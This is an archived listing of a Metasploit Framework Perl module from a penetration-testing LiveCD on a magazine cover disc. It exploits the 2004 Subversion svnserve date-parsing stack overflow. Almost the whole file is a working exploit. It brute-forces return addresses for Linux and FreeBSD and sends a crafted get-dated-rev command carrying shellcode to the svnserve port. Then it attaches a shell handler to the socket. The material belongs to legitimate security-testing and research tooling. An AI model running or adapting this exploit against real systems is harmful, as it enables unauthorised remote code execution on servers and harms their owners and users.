home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / svnserve_date.pm < prev    next >
Text File  |  2006-06-30  |  5KB  |  173 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::svnserve_date;
  11. use strict;
  12. use base 'Msf::Exploit';
  13. use Pex::Text;
  14.  
  15. my $advanced =
  16.   {
  17.     'StackTop'     => ['', 'Start address for stack ret bruteforcing, empty for defaults from target'],
  18.     'StackBottom'  => ['', 'End address for stack ret bruteforcing, empty for defaults from target'],
  19.     'StackStep'    => [0, 'Step size for ret bruteforcing, 0 for auto calculation.'],
  20.     'BruteWait'    => [.4, 'Length in seconds to wait between bruteforce attempts'],
  21.  
  22.     # This was like 62 on my machine and 88 on HD's
  23.     'RetLength'    => [100, 'Length of rets after payload'],
  24.     'IgnoreErrors' => [0, 'Keep going even after critical errors.'],
  25.   };
  26.  
  27. my $info = {
  28.     'Name'    => 'Subversion Date Svnserve',
  29.     'Version' => '$Revision: 1.35 $',
  30.     'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
  31.  
  32.     'Arch'    => [ 'x86' ],
  33.     'OS'      => [ 'linux', 'bsd' ],
  34.     'Priv'    => 0,
  35.  
  36.     'UserOpts'  =>
  37.       {
  38.         'RHOST' => [1, 'ADDR', 'The target address'],
  39.         'RPORT' => [1, 'PORT', 'The svnserve port', 3690],
  40.         'URL'   => [1, 'DATA', 'SVN URL (ie svn://host/repos)', 'svn://host/svn/repos'],
  41.       },
  42.  
  43.     'Payload' =>
  44.       {
  45.         'Space'     => 500,
  46.         'BadChars'  => "\x00\x09\x0a\x0b\x0c\x0d\x20",
  47.         'MinNops'   => 16, # This keeps brute forcing sane
  48.         'Keys'      => ['+findsock'],
  49.       },
  50.  
  51.     'Nop' =>
  52.       {
  53.         'SaveRegs' => ['esp'],
  54.       },
  55.  
  56.     'Description'  => Pex::Text::Freeform(qq{
  57.       This is an exploit for the Subversion date parsing overflow.  This
  58.       exploit is for the svnserve daemon (svn:// protocol) and will not work
  59.       for Subversion over webdav (http[s]://).  This exploit should never
  60.       crash the daemon, and should be safe to do multi-hits.
  61.  
  62.       **WARNING** This exploit seems to (not very often, I've only seen
  63.       it during testing) corrupt the subversion database, so be careful!
  64. }),
  65.  
  66.     'Refs'  =>
  67.       [
  68.         ['OSVDB', '6301'],
  69.         ['URL', 'http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html'],
  70.         ['MIL', '68'],
  71.       ],
  72.  
  73.     'DefaultTarget' => -1,
  74.     'Targets' =>
  75.       [
  76.         ['Linux Bruteforce', '0xbffffe13', '0xbfff0000'],
  77.         ['FreeBSD Bruteforce', '0xbfbffe13', '0xbfbf0000'],
  78.       ],
  79.  
  80.     'Keys'  => ['subversion'],
  81.  
  82.     'DisclosureDate' => 'May 19 2004',
  83.   };
  84.  
  85. sub new {
  86.     my $class = shift;
  87.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  88.  
  89.     return($self);
  90. }
  91.  
  92. sub Exploit {
  93.     my $self = shift;
  94.  
  95.     my $targetHost  = $self->GetVar('RHOST');
  96.     my $targetPort  = $self->GetVar('RPORT');
  97.     my $targetIndex = $self->GetVar('TARGET');
  98.     my $encodedPayload = $self->GetVar('EncodedPayload');
  99.     my $shellcode   = $encodedPayload->Payload;
  100.     my $target = $self->Targets->[$targetIndex];
  101.  
  102.     my $retLength   = $self->GetLocal('RetLength');
  103.     my $bruteWait   = $self->GetLocal('BruteWait');
  104.     my $stackTop    = $self->GetLocal('StackTop');
  105.     my $stackBottom = $self->GetLocal('StackBottom');
  106.     my $stackStep   = $self->GetLocal('StackStep');
  107.     my $url         = $self->GetVar('URL');
  108.     my $srcPort     = $self->GetVar('CPORT');
  109.  
  110.     $stackTop    = $target->[1] if(!length($stackTop));
  111.     $stackBottom = $target->[2] if(!length($stackBottom));
  112.     $stackTop    = hex($stackTop);
  113.     $stackBottom = hex($stackBottom);
  114.  
  115.     $stackStep = $encodedPayload->NopsLength if($stackStep == 0);
  116.     $stackStep -= $stackStep % 4; # ya ya, whatever
  117.  
  118.     for(my $ret = $stackTop; $ret >= $stackBottom; $ret = $self->StepAddress('Address' => $ret, 'StepSize' => $stackStep)) {
  119.         my $sock = Msf::Socket::Tcp->new('PeerAddr' => $targetHost, 'PeerPort' => $targetPort, 'LocalPort' => $srcPort);
  120.         if($sock->IsError) {
  121.             $self->PrintLine('Error creating socket: ' . $sock->GetError);
  122.             return;
  123.         }
  124.  
  125.         $self->PrintLine(sprintf("Trying %#08x", $ret));
  126.         my $evil = (pack('V', $ret) x int($retLength / 4)) . $shellcode;
  127.  
  128.         #    my $evil = 'A' x 300;
  129.  
  130.         my @data =  (
  131.             '( 2 ( edit-pipeline ) ' . lengther($url) . ' ) ',
  132.             '( ANONYMOUS ( 0: ) ) ',
  133.             '( get-dated-rev ( ' .
  134.  
  135. #  lengther('Tue' . 'A' x $ARGV[0] . ' 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off -18000)') . ' ) ) '.
  136.               lengther($evil . ' 3 Oct 2000 01:01:01.001 (day 277, dst 1, gmt_off)') . ' ) ) ',
  137.             '',
  138.           );
  139.  
  140.         my $i = 0;
  141.         foreach my $data (@data) {
  142.             my $dump = $sock->Recv(-1);
  143.             $self->PrintDebugLine(3, "dump\n$dump");
  144.             if(!$sock->Send($data) && $i < 3) {
  145.                 $self->PrintLine('Error in send.');
  146.                 $sock->PrintError;
  147.                 $self->PrintLine('This is bad.');
  148.                 $self->PrintLine("$dump\n");
  149.                 return if(!$self->GetLocal('IgnoreErrors'));
  150.             }
  151.             if($i == 3 && length($dump)) {
  152.                 $self->PrintLine("Received data when we should't have, bailing.");
  153.                 $self->PrintLine($dump);
  154.                 return if(!$self->GetLocal('IgnoreErrors'));
  155.             }
  156.             $i++;
  157.         }
  158.  
  159.         select(undef, undef, undef, $bruteWait); # ghetto sleep
  160.         $self->Handler($sock);
  161.         $sock->Close;
  162.         select(undef, undef, undef, 1) if($srcPort); # ghetto sleep, wait for CPORT
  163.     }
  164.     return;
  165. }
  166.  
  167. sub lengther {
  168.     my $data = shift;
  169.     return(length($data) . ':' . $data);
  170. }
  171.  
  172. 1;
  173.